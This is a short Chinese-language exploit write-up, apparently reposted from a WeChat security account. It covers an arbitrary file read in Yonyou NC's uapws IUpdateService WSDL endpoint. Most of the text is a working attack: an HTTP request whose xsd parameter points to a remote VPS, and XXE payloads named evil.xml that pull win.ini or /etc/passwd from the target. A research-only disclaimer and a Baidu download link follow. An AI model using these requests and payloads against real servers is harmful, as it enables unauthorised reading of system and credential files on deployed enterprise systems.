漏洞存在位置
http://x.x.x.x/uapws/service/nc.uap.oba.update.IUpdateService?wsdl
修改xsd参数值可触发该漏洞,请求远程VPS服务器。
GET /uapws/service/nc.uap.oba.update.IUpdateService?xsd=http://x.x.x.x/test.xml HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
存在漏洞响应如下
任意文件读取利用,需要VPS上建立对应操作系统的xml文件,然后开启http服务。xml文件如下
windows:
<!ENTITY name SYSTEM "file:///c://windows/win.ini">
]>
<user><username>&name;</username><password>1</password></user>
linux:
evil.xml:
<!ENTITY name SYSTEM "file:///etc/passwd">
]>
<user><username>&name;</username><password>1</password></user>
触发文件读取漏洞响应如下
链接:https://pan.baidu.com/s/1oUd3H7yOdYCXLUCfuzA0DA
提取码:bgl0
原文始发于微信公众号(天澜实验室):用友 NC uapws wsdl 任意文件读取
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论